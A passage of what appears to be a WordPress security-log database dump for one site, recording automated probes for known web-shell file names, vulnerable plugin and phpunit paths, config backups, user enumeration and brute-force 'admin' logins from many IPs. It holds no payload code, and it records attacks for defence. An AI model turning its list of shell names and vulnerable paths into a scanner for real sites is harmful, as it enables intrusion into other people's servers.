k1jvnH9qah','','19|0|0|0|ashbooks.co.uk/wp-confirm.php'),('141.94.206.147',2371800723,'',0,1636421778.4598,55,'rU3NbVzBp6uO70qfYZRmwoiQ','','19|0|0|0|ashbooks.co.uk/images/vuln.php'),('141.94.206.147',2371800723,'',0,1636421784.5093,55,'rtFxUuDNnPOfKkIyj90VXHia','','19|0|0|0|ashbooks.co.uk/dr.php'),('141.94.206.147',2371800723,'',0,1636421799.8891,55,'lEjCALR0G8aWQtXvH5FY1sZ7','','19|0|0|0|ashbooks.co.uk/upload.php'),('141.94.206.147',2371800723,'',0,1636421824.6489,55,'fo5G3BpaJR62KkzFmwqrliYC','','19|0|0|0|ashbooks.co.uk/bypass.php'),('141.94.206.147',2371800723,'',0,1636421863.2617,55,'2HmGxKOrWpBQCDYzXUiNtM1e','','19|0|0|0|ashbooks.co.uk/wp-blog.php'),('141.94.206.147',2371800723,'',0,1636421873.0069,55,'0fyH4PQBsog31TLctJ5lDeFv','','19|0|0|0|ashbooks.co.uk/data.php'),('141.94.206.147',2371800723,'',0,1636421878.7656,55,'jkNUlF1n5yJwrsEaoZ0vz8bi','','19|0|0|0|ashbooks.co.uk/owl.php'),('141.94.206.147',2371800723,'',0,1636421897.1281,55,'Zn0XlGd8NcIL6J57srybueqD','','19|0|0|0|ashbooks.co.uk/vuln.php'),('141.94.206.147',2371800723,'',0,1636421910.6971,55,'8AIzGLpJm2Nb0dDSkvuXcfPa','','19|0|0|0|ashbooks.co.uk/symlink.php'),('141.94.206.147',2371800723,'',0,1636421917.8803,55,'SemqIdCPWH2oDhi7QuZ3OXYl','','19|0|0|0|ashbooks.co.uk/ohayo.php'),('141.94.206.147',2371800723,'',0,1636421928.4480,55,'VvY0JFAsj9lWD5aPumpzHNdo','','19|0|0|0|ashbooks.co.uk/100.php'),('141.94.206.147',2371800723,'',0,1636421932.7890,55,'tqLMlUxX0EaZN7p14jJkAR8n','','19|0|0|0|ashbooks.co.uk/777.php'),('141.94.206.147',2371800723,'',0,1636421938.6585,55,'QfILrHq3xe6jG87NSwcmso5B','','19|0|0|0|ashbooks.co.uk/wp-content/wp-logins.php'),('141.94.206.147',2371800723,'',0,1636421948.0376,55,'sTlvqKCwzhbUFAXZpN8R3JI5','','19|0|0|0|ashbooks.co.uk/1index.php'),('141.94.206.147',2371800723,'',0,1636421957.2506,55,'3AoBSi1dMRX2Nv6hEUl74jIG','','19|0|0|0|ashbooks.co.uk/wp-wso.php'),('141.94.206.147',2371800723,'',0,1636421970.0964,55,'KvxEWcHXuP8o5FqVze6UMpG0','','19|0|0|0|ashbooks.co.uk/2index.php'),('141.94.206.147',2371800723,'',0,1636421977.2941,55,'1btwvCorjFWVM0zDERNxpPca','','19|0|0|0|ashbooks.co.uk/wp-content/wp-admin.php'),('141.94.206.147',2371800723,'',0,1636421991.8149,55,'WgoeEQIb3a16U5DLKAHSrwdX','','19|0|0|0|ashbooks.co.uk/wp-configer.php'),('141.94.206.147',2371800723,'',0,1636421998.2789,55,'jrc8yV7Q4uIYnR3PW5a0tbMC','','19|0|0|0|ashbooks.co.uk/wp-admin.php'),('141.94.206.147',2371800723,'',0,1636422008.7818,55,'W3ilhSPskuA59mDqnEKLFQo2','','19|0|0|0|ashbooks.co.uk/mini.php'),('141.94.206.147',2371800723,'',0,1636422025.0279,55,'EbPtnL1zG5m2duhgUqMaKxsl','','19|0|0|0|ashbooks.co.uk/old-index.php'),('141.94.206.147',2371800723,'',0,1636422033.1828,55,'iFmKzYs6phJXR3MTxSgyQvjA','','19|0|0|0|ashbooks.co.uk/doc.php'),('141.94.206.147',2371800723,'',0,1636422050.8392,55,'rs9IY80nBqcu26zTMURoNwtb','','19|0|0|0|ashbooks.co.uk/ups.php'),('141.94.206.147',2371800723,'',0,1636422077.1440,55,'PO3I4DC5bNt7n1isQmVMgeaW','','19|0|0|0|ashbooks.co.uk/shx.php'),('141.94.206.147',2371800723,'',0,1636422097.8555,55,'sPRjzT3X5tV7IKSZkxiy08E4','','19|0|0|0|ashbooks.co.uk/FoxWSO.php'),('141.94.206.147',2371800723,'',0,1636422107.9770,55,'C96fb5L72eaJZo1Enhg8cMr3','','19|0|0|0|ashbooks.co.uk/x.php'),('141.94.206.147',2371800723,'',0,1636422128.4323,55,'17B30MWCQTnhlS2ULxXr98qe','','19|0|0|0|ashbooks.co.uk/cms.php'),('141.94.206.147',2371800723,'',0,1636422158.9960,55,'tnab5hmRNfskdDy06qK3zT8A','','19|0|0|0|ashbooks.co.uk/stindex.php'),('141.94.206.147',2371800723,'',0,1636422164.1821,55,'8jZAyQMJ7DTKebOxEIUPwzv1','','19|0|0|0|ashbooks.co.uk/wp-uploads.php'),('141.94.206.147',2371800723,'',0,1636422179.5806,55,'Jj7p8UMhbWl0NZRyDgruYcGX','','19|0|0|0|ashbooks.co.uk/autoload_classmap.php'),('141.94.206.147',2371800723,'',0,1636422185.3109,55,'AcZLPW75YE4k9xSDaIBOT3dX','','19|0|0|0|ashbooks.co.uk/Gel.php'),('141.94.206.147',2371800723,'',0,1636422193.4768,55,'RMHeLXZhg3PNw48jGBUOn0J1','','19|0|0|0|ashbooks.co.uk/defau1t.php'),('141.94.206.147',2371800723,'',0,1636422204.5642,55,'VCLB8F9nUzRtkqDj0cGKWfbI','','19|0|0|0|ashbooks.co.uk/0byte.php'),('141.94.206.147',2371800723,'',0,1636422212.1702,55,'F1SsOxmtDlG56kLycJq3hgHM','','19|0|0|0|ashbooks.co.uk/wp.php'),('141.94.206.147',2371800723,'',0,1636422220.9973,55,'loeQYtu7wgGN2U54TXRjp3rO','','19|0|0|0|ashbooks.co.uk/zeb.php'),('141.94.206.147',2371800723,'',0,1636422227.1981,55,'rQNaBRItUKubJ3wjvGLg19ol','','19|0|0|0|ashbooks.co.uk/zab.php'),('141.94.206.147',2371800723,'',0,1636422236.7674,55,'PJXoCqb3vhT7lejdwVuc2zEy','','19|0|0|0|ashbooks.co.uk/41.php'),('141.94.206.147',2371800723,'',0,1636422242.8423,55,'6tcyUXlLA1h8xRFIG9CWpSqY','','19|0|0|0|ashbooks.co.uk/media-admin.php'),('141.94.206.147',2371800723,'',0,1636422252.5630,55,'iatdFuZ4xqh16bP9mGYB7Epo','','19|0|0|0|ashbooks.co.uk/4price.php'),('141.94.206.147',2371800723,'',0,1636422282.5950,55,'W2Dkpi3hd8ubyf4sBFt9Ez1m','','19|0|0|0|ashbooks.co.uk/MARIJUANA.php'),('141.94.206.147',2371800723,'',0,1636422293.8592,55,'PtQuoqBGWyRlkhmIDXVCsOUL','','19|0|0|0|ashbooks.co.uk/f.php'),('141.94.206.147',2371800723,'',0,1636422300.5471,55,'GKj538YHdauVmTgyikwBxLnI','','19|0|0|0|ashbooks.co.uk/.fk.php'),('141.94.206.147',2371800723,'',0,1636422315.4498,55,'z0BfvyHPXMS4aNVDEmlckgOU','','19|0|0|0|ashbooks.co.uk/wikindex.php'),('141.94.206.147',2371800723,'',0,1636422328.4234,55,'zQieurIVvdH7JbxaDPS534nN','','19|0|0|0|ashbooks.co.uk/xox.php'),('141.94.206.147',2371800723,'',0,1636422343.2282,55,'jk1lMZwTJfm8eOIFnp5h4GrL','','19|0|0|0|ashbooks.co.uk/o.php'),('141.94.206.147',2371800723,'',0,1636422352.2822,55,'e0jrMmPqzJGinVX3fCyS6duE','','19|0|0|0|ashbooks.co.uk/new.php'),('141.94.206.147',2371800723,'',0,1636422357.2565,55,'smnJ9x5N1VKdp6i7S8hwURGI','','19|0|0|0|ashbooks.co.uk/3index.php'),('141.94.206.147',2371800723,'',0,1636422373.3195,55,'ta1mFCLISY7Edjg20zl3Ocf8','','19|0|0|0|ashbooks.co.uk/sindex.php'),('141.94.206.147',2371800723,'',0,1636422383.9391,55,'Ad5EOh7Rbi9mgVqj8rFWDeck','','19|0|0|0|ashbooks.co.uk/baindex.php'),('141.94.206.147',2371800723,'',0,1636422388.4785,55,'y0ARd8HGoVXPcmDphTlNOqJj','','19|0|0|0|ashbooks.co.uk/new-index.php'),('141.94.206.147',2371800723,'',0,1636422400.0986,55,'e3MXoJiD8jhrKyR1pQ5ZPsdB','','19|0|0|0|ashbooks.co.uk/wi.php'),('141.94.206.147',2371800723,'',0,1636422413.2978,55,'YFSogmIzWhpeaMKfv3nPxCt2','','19|0|0|0|ashbooks.co.uk/XxX.php'),('141.94.206.147',2371800723,'',0,1636422418.0213,55,'O5WKNjBkI3SclE41FUwDvhoZ','','19|0|0|0|ashbooks.co.uk/mar.php'),('141.94.206.147',2371800723,'',0,1636422421.9393,55,'NRB2bjyfp7WnaCV1k4sJrXdu','','19|0|0|0|ashbooks.co.uk/root.php'),('141.94.206.147',2371800723,'',0,1636422425.7380,55,'lAQz1odgiGyc02a7xwNkqKPD','','19|0|0|0|ashbooks.co.uk/11index.php'),('141.94.206.147',2371800723,'',0,1636422453.6390,50,'mscQDSxnOu0I7Ji293qpCobr','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('141.94.206.147',2371800723,'',0,1636422462.4093,55,'lErfk5MapJQFbXG2o8mqjTOV','','19|0|0|0|ashbooks.co.uk/nee.php'),('141.94.206.147',2371800723,'',0,1636422473.5648,55,'QWALni4g2useVrkJG731acoB','','19|0|0|0|ashbooks.co.uk/v.php'),('141.94.206.147',2371800723,'',0,1636422483.9673,55,'fpU869ma7kxVdBYoF0Et54Dz','','19|0|0|0|ashbooks.co.uk/z.php'),('141.94.206.147',2371800723,'',0,1636422491.5514,55,'K6nijZAgMaR4sQ1NwHv9BV2f','','19|0|0|0|ashbooks.co.uk/xx.php'),('141.94.206.147',2371800723,'',0,1636422502.2828,55,'WNaRIYZGt2eomnbxT7wQ3v5P','','19|0|0|0|ashbooks.co.uk/g.php'),('141.94.206.147',2371800723,'',0,1636422517.0531,55,'rlGBeC1jimQLf860VvpaAEMw','','19|0|0|0|ashbooks.co.uk/m.php'),('141.94.206.147',2371800723,'',0,1636422528.0322,55,'SmxF0XhQiObojzJ9EDY3paB4','','19|0|0|0|ashbooks.co.uk/shell.php'),('141.94.206.147',2371800723,'',0,1636422541.3519,55,'wWeUa0XZfbq26iS3FxnNmAyg','','19|0|0|0|ashbooks.co.uk/sh3ll.php'),('141.94.206.147',2371800723,'',0,1636422546.9424,55,'mlcvyju5RiVADwspMInPzTL6','','19|0|0|0|ashbooks.co.uk/c99.php'),('141.94.206.147',2371800723,'',0,1636422572.4172,55,'ZimId0nfGvq1r9EYDBcxHXey','','19|0|0|0|ashbooks.co.uk/alexuse.php'),('141.94.206.147',2371800723,'',0,1636422578.3886,55,'ojtzuAr1WNGafREbLw5ln3qY','','19|0|0|0|ashbooks.co.uk/w.php'),('141.94.206.147',2371800723,'',0,1636422597.3506,55,'vmRMtIAw9XK8hlrE3Nzc6gsU','','19|0|0|0|ashbooks.co.uk/ws.php'),('141.94.206.147',2371800723,'',0,1636422603.5340,55,'wxK3eGDyvbWNgLasFO4zlfY7','','19|0|0|0|ashbooks.co.uk/2.php'),('141.94.206.147',2371800723,'',0,1636422608.1466,55,'deq2KJcuRlxbQMUajNzFi9VD','','19|0|0|0|ashbooks.co.uk/lol.php'),('141.94.206.147',2371800723,'',0,1636422615.6968,55,'WkrBfGLhXy8b9YZpoxQiNR2n','','19|0|0|0|ashbooks.co.uk/87.php'),('141.94.206.147',2371800723,'',0,1636422632.4138,55,'nMq8ESeKUIhtC2XfHdsmPGoF','','19|0|0|0|ashbooks.co.uk/7yn.php'),('141.94.206.147',2371800723,'',0,1636422636.7224,55,'B9obRSnm4FAeZxYlzVvCh6dL','','19|0|0|0|ashbooks.co.uk/haxor.php'),('141.94.206.147',2371800723,'',0,1636422647.1390,55,'Zb8cyIk72FVDswSgJ3f4ejiU','','19|0|0|0|ashbooks.co.uk/403.php'),('141.94.206.147',2371800723,'',0,1636422658.1769,55,'xK2vfgQhZYiBekonLNSPAW71','','19|0|0|0|ashbooks.co.uk/13.php'),('141.94.206.147',2371800723,'',0,1636422664.9318,55,'ji0LDO9VWJFlK5Q4xXmnAGIM','','19|0|0|0|ashbooks.co.uk/cpanel.php'),('141.94.206.147',2371800723,'',0,1636422681.1550,55,'87ytEVDdL3JPXc2ZevOfYG56','','19|0|0|0|ashbooks.co.uk/wp-configr.php'),('141.94.206.147',2371800723,'',0,1636422693.1465,55,'k0T2GlywsugxoRYVj83CriLQ','','19|0|0|0|ashbooks.co.uk/lufix.php'),('141.94.206.147',2371800723,'',0,1636422699.1725,55,'wN1sXRtZqb9vjzyh6xLPlT80','','19|0|0|0|ashbooks.co.uk/olux.php'),('141.94.206.147',2371800723,'',0,1636422716.7985,55,'o4UMn1ZmJ6SNgWYcjL0COEpy','','19|0|0|0|ashbooks.co.uk/shadow.php'),('141.94.206.147',2371800723,'',0,1636422722.9112,55,'nNG7mYlkwyzeWHEh8BrQSFAp','','19|0|0|0|ashbooks.co.uk/xd.php'),('141.94.206.147',2371800723,'',0,1636422774.7376,55,'aBNrU2cQpo9i3CMKbxwtOvZu','','19|0|0|0|ashbooks.co.uk/XD.php'),('162.243.228.106',2733892714,'',0,1636433808.5968,55,'gwtSu5mXlYR94o1esPEI86vA','','19|0|0|0|ashbooks.co.uk/wp-admin/upload_index.php'),('45.144.225.29',764469533,'',0,1636433926.1127,55,'sIKnWXSQcPCuiZ5oqawrtBJk','','19|0|0|0|ashbooks.co.uk/style.php'),('45.144.225.29',764469533,'',0,1636433949.3048,55,'hdtvaNsVGIZB8Ag4izTrqEfp','','19|0|0|0|ashbooks.co.uk/moduless.php'),('45.144.225.29',764469533,'',0,1636433972.8500,55,'pbVuhRMqsdrZ9tHx0B6PoDFg','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('45.144.225.29',764469533,'',0,1636433982.5020,55,'0K4XDkp7olYOu2SJw5TiVCLn','','19|0|0|0|ashbooks.co.uk/admin.php'),('212.83.147.15',3562246927,'',0,1636433990.2516,55,'EPjn7wATvF9L8tCV2IBRG5fm','','19|0|0|0|ashbooks.co.uk/old-index.php'),('45.144.225.29',764469533,'',0,1636434001.3758,55,'hOVl9XIpFrQJNExgjRk02ACD','','19|0|0|0|ashbooks.co.uk/boom.php'),('45.144.225.29',764469533,'',0,1636434001.3901,10,'hOVl9XIpFrQJNExgjRk02ACD','','707|0|0|0|ashbooks.co.uk/boom.php'),('45.144.225.29',764469533,'',0,1636434003.6028,55,'RIvfioKrACQYFUVx8wZH5O0D','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('45.144.225.29',764469533,'',0,1636434025.0395,55,'820sMcHXeQwxfIraRdDmOlyN','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('45.144.225.29',764469533,'',0,1636434044.2030,100,'EAhaYkduCDFj2RLZ4vnQbMyU','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('45.144.225.29',764469533,'',0,1636434079.5721,100,'r7s9gXvdDE4iVA1xNmHMu0BY','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('45.144.225.29',764469533,'',0,1636434099.5372,100,'I7WhVMe4uyFXROriDfoLHzTs','','13|0|0|0|ashbooks.co.uk/larva.php'),('45.144.225.29',764469533,'',0,1636434114.2108,100,'fJ7kPqldxDGethg1FTsvQWM6','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('45.144.225.29',764469533,'',0,1636434124.8619,55,'BcJpy4uG6xhC2M1vULdlmV9j','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('45.144.225.29',764469533,'',0,1636434145.9080,55,'150IlbrL8SXafVpEzUjow7Os','','19|0|0|0|ashbooks.co.uk/alfa.php'),('45.144.225.29',764469533,'',0,1636434176.6797,55,'u6ZPBeHMGRv40j7Xs9fln5Lq','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('45.144.225.29',764469533,'',0,1636434199.0856,55,'l2N017zVxesQJD86iyav4o95','','19|0|0|0|ashbooks.co.uk/cindex.php'),('45.144.225.29',764469533,'',0,1636434221.3349,55,'JB9GLIz1VdmbC5H8FOSPZvEl','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('45.144.225.29',764469533,'',0,1636434238.1120,55,'4kKiRrzjSTLNoAMXgtaWJeYm','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('45.144.225.29',764469533,'',0,1636434253.1728,55,'OofaFjDNeipwhTKs06LPIcQC','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('45.144.225.29',764469533,'',0,1636434269.4964,55,'QqFSL2OuhZCpoJcD5sVEvRXa','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('45.144.225.29',764469533,'',0,1636434293.6158,55,'ZlsdvohixcYnUTOADwRV4Itb','','19|0|0|0|ashbooks.co.uk/old-index.php'),('45.144.225.29',764469533,'',0,1636434307.9455,55,'Yob8JkQB97hEGUzwadfjlVSp','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('45.144.225.29',764469533,'',0,1636434325.5309,55,'s4Q2m8OpdtPBaDgU6FCcNZkE','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('45.144.225.29',764469533,'',0,1636434341.0352,55,'dWr9YyeZwTJAIUzGH2kS60ib','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('45.144.225.29',764469533,'',0,1636434362.2059,55,'LvWdSpeRTnVYfoUZBgAjaz64','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('45.144.225.29',764469533,'',0,1636434376.6109,55,'uSCeOcsgbwHUWAMX4doPtjRG','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('45.144.225.29',764469533,'',0,1636434390.6932,55,'cJvo5AhKgHP94XB16L7uj8fY','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('45.144.225.29',764469533,'',0,1636434410.6303,18,'UZVbAXBmQ7saHucWP19OEdzg','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('45.144.225.29',764469533,'',0,1636434429.0104,55,'gUN1j76EhLlMaBVxdJ5pnys8','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('45.144.225.29',764469533,'',0,1636434448.6747,100,'zoA7UiONCDZgTfFER5Jt60eq','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('45.144.225.29',764469533,'',0,1636434466.3356,100,'3OPbneNUFzX0YSqlpMCa69cE','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('45.144.225.29',764469533,'',0,1636434482.5936,55,'aTu0e12WVCxiIsXYd5SwrE3h','','19|0|0|0|ashbooks.co.uk/haders.php'),('45.144.225.29',764469533,'',0,1636434498.7796,100,'L2UqSNZrBAY83v5McuXWgKIT','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('45.144.225.29',764469533,'',0,1636434513.2253,55,'DiTKqrN2ho189AtZv3fpHyQk','','19|0|0|0|ashbooks.co.uk/legion.php'),('45.144.225.29',764469533,'',0,1636434529.8572,55,'1ysX0YxNM9mE86AK4JH25qQU','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('45.144.225.29',764469533,'',0,1636434549.5164,55,'01pVJQh64KCba8qLPToX2RSG','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('45.144.225.29',764469533,'',0,1636434564.4085,55,'LQkcaNFyC2veGA36TnZ0XEr9','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('45.144.225.29',764469533,'',0,1636434577.8133,55,'CcrUqHYskjb5RD3Go01weJv8','','19|0|0|0|ashbooks.co.uk/up.php'),('45.144.225.29',764469533,'',0,1636434591.0804,55,'PpuFtyZKg8A74mUJR2jQzBbx','','19|0|0|0|ashbooks.co.uk/upload.php'),('45.144.225.29',764469533,'',0,1636434611.6887,55,'8djnDNXk02TLZoWauvC1fsJz','','19|0|0|0|ashbooks.co.uk/config.php'),('45.144.225.29',764469533,'',0,1636434642.8468,100,'IZ9Yjltch3SW4mXLvwBGT1ny','','13|0|0|0|ashbooks.co.uk/test.php'),('45.144.225.29',764469533,'',0,1636434662.0183,55,'gya6FitUTKknIzQd3Ge9J5Ds','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('45.144.225.29',764469533,'',0,1636434682.7402,55,'85Fm3wCy0oLfxQdIbnD4ri9l','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('45.144.225.29',764469533,'',0,1636434703.4103,55,'2rvJNkLdqWPuCBt3bKR60Qfx','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('212.83.147.15',3562246927,'',0,1636435488.8046,55,'jgh5SUtrAPKxaw19Vo6kBef0','','19|0|0|0|ashbooks.co.uk/upl.php'),('46.246.3.202',787874762,'',0,1636439637.2526,55,'0BuU2LIRGsCpeknNdAwvox7b','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('20.90.26.23',341449239,'',0,1636467660.4167,70,'gvcxUqEPLIhrjlS7kMJCn4T3','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('2.56.59.43',37239595,'',0,1636489227.8904,70,'OpvVCHMtbzXerANlEBZqjsUR','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('51.15.20.50',856626226,'',0,1636490206.5493,55,'PfCYs2698JcAoKGr3zdNxRnj','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('51.15.20.50',856626226,'',0,1636492273.5386,70,'DMlVL4JRoh3wf1uIk5pENzCT','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/1'),('157.245.174.114',2650123890,'',0,1636500136.7619,55,'NzCTjhEP1D7vFHcI84ur9kgi','','19|0|0|0|ashbooks.co.uk/x.php'),('157.245.174.114',2650123890,'',0,1636500137.4579,55,'9gTK0BM3W6pEe1J5VqZno4ka','','19|0|0|0|ashbooks.co.uk/alfa.php'),('157.245.174.114',2650123890,'',0,1636500137.9195,55,'w7b1hBngE9s8ekzVUXrPxAdc','','19|0|0|0|ashbooks.co.uk/c99.php'),('157.245.174.114',2650123890,'',0,1636500138.6173,55,'gSaKJv34bDkVLXxjCYs7EBdu','','19|0|0|0|ashbooks.co.uk/mini.php'),('157.245.174.114',2650123890,'',0,1636500139.0712,55,'dDNYhjOTsqZpKyWzRntlaiBf','','19|0|0|0|ashbooks.co.uk/a.php'),('157.245.174.114',2650123890,'',0,1636500139.1003,10,'dDNYhjOTsqZpKyWzRntlaiBf','','707|0|0|0|ashbooks.co.uk/a.php'),('157.245.174.114',2650123890,'',0,1636500139.7911,55,'J1WiNruIURMXb9ZlYxqmPAp3','','19|0|0|0|ashbooks.co.uk/wso.php'),('157.245.174.114',2650123890,'',0,1636500140.4830,55,'Xj6dgthYiEZoLNeQ47vwUACm','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/dzs-zoomsounds/wp_mnax.php'),('157.245.174.114',2650123890,'',0,1636500141.5043,55,'8tmjR1pc2OHxdN5CZhb4noge','','19|0|0|0|ashbooks.co.uk/leafmailer.php'),('157.245.174.114',2650123890,'',0,1636500141.9526,55,'YdXxsanzPWSCFZhQH2kego0G','','19|0|0|0|ashbooks.co.uk/le.php'),('157.245.174.114',2650123890,'',0,1636500142.6333,55,'3LdW5J9hAn1IOqeiPYElNkjQ','','19|0|0|0|ashbooks.co.uk/1index.php'),('157.245.174.114',2650123890,'',0,1636500143.0908,55,'G6j4kizgw0ONncPXALvlIp9b','','19|0|0|0|ashbooks.co.uk/fw.php'),('194.58.88.114',3258603634,'',0,1636502177.4097,70,'glmbyvpI9ZDhQUW68R75Oe40','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('23.228.109.147',400846227,'',0,1636502656.5507,55,'02lonKGxfkVdZIp3tJBEhTqQ','','19|0|0|0|ashbooks.co.uk/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php'),('176.107.128.162',2959835298,'',0,1636507949.5661,70,'3vU7rF8GT2AKsnd96xwiycaW','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('54.193.101.186',918644154,'',0,1636508170.9899,70,'oVAEvezbR3gfHwChW8QxKymX','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('54.193.101.186',918644154,'admin',0,1636508174.2835,7,'Sbht2s3YIXw4AcBLFRO8UeGk','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636509455.9515,51,'aslbMm0wD1kXeOCRWQIZpAjx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('67.205.3.168',1137509288,'',0,1636519831.1204,70,'IViOXjCNPS4H03LlAWKFTRGa','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('5.188.62.76',96222796,'ashbooks',0,1636520063.1394,51,'a50MPRodLjsiUnQCNTFf3J9u','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636530608.3101,51,'UCwqibEJMLQHosK2dcGXBvVu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.55.85.219',2721535451,'',0,1636531001.0480,55,'s4MS5RPIhx3oz1NpKqFcmnfX','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('200.58.109.114',3359272306,'admin',0,1636534102.4389,7,'zJRdEnUZLQFbpNxqvO3Meu6y','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('143.110.254.148',2406416020,'admin',0,1636534710.8803,7,'hVtKLNwQZvrWcemYplaUFTfR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('93.158.161.75',1570677067,'',0,1636535153.2524,55,'3sxgEU012Tw79oMhtziZdVfF','','19|0|0|0|ashbooks.co.uk/weblog/index.php'),('103.129.178.69',1736553029,'admin',0,1636535433.1525,7,'4I2MVNuDSbQGmJFhERnoK1Wv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('43.129.212.158',729928862,'admin',0,1636536098.2590,7,'8NIE0k5vyFDtAlL9TKqOwhWf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('152.136.15.140',2559053708,'admin',0,1636536778.2232,7,'VsQ0K179oady5DeifIz8lEph','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.219.231.69',2329667397,'admin',0,1636537476.1816,7,'fkPR0Zo5LUla2TBCrNDwWnYG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('62.171.185.46',1051441454,'admin',0,1636538188.4552,7,'kvRes5YIwbQ9ZUP6gd2nmHN3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.70.29.133',1732648325,'admin',0,1636538840.2223,7,'KvyZEBlr2DzJGSuVP9OwkFcs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.254.50.20',3003003412,'admin',0,1636539510.6019,7,'iRtxrAsEpSUuPqbym9vlZC5M','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('212.192.241.137',3569414537,'',0,1636539960.4645,70,'gsHGOCXxjqKoDkviRtrTlFIW','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('185.165.118.46',3114628654,'admin',0,1636540210.4717,7,'rVLdjScgC7OZ3fpWyxkiaFG2','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('101.133.153.105',1703254377,'admin',0,1636540881.3628,7,'xLBeZoGcCH7irUj3gbSfdJt9','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636541229.5470,51,'yYpw4mxlrouDQg815GtL7RAj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('43.129.212.158',729928862,'admin',0,1636541564.0283,7,'dWlHBJeM6mRw4ynLFuTaoh8t','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('40.122.130.155',679117467,'',0,1636542093.5626,70,'eGjcY1RO86TErvyq9QaXfAMU','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('109.234.161.67',1844093251,'admin',0,1636542262.6160,7,'XwCDLZ6bz08oWORnJtPmI2E5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.240.13.151',2733641111,'admin',0,1636542955.1029,7,'ZflsI8jtcSHXKP90GU2FpEnL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.0.208.15',2717962255,'admin',0,1636543662.3197,7,'j8J4COGz1inZWKlyM7fS5mkx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.97.90.217',2707512025,'admin',0,1636544374.0176,7,'OTNLgCQr6XSaJnDiel8dbU1G','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.93.16.69',1734152261,'admin',0,1636545093.9736,7,'9JUpwDikSygzxjGHO6dhq7a4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('213.149.103.132',3583338372,'admin',0,1636545805.4502,7,'2cZeni9mwtvObQSXrpKxLu3W','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('184.171.244.231',3098277095,'admin',0,1636546525.9642,7,'h3ZfDUXcJbvTVziaC72eol6g','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('111.231.82.232',1877431016,'admin',0,1636547277.9927,7,'5KXvL2aSlepAPI69xJcEiwy1','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('62.210.113.228',1053979108,'admin',0,1636547971.1215,7,'xlygVF9JEGRwkIncaYjeKomM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.214.114.242',2731963122,'admin',0,1636548693.4208,7,'nwyMO9LJTsGKFkdDcV627IPH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('63.143.41.18',1066346770,'admin',0,1636549537.1383,7,'Po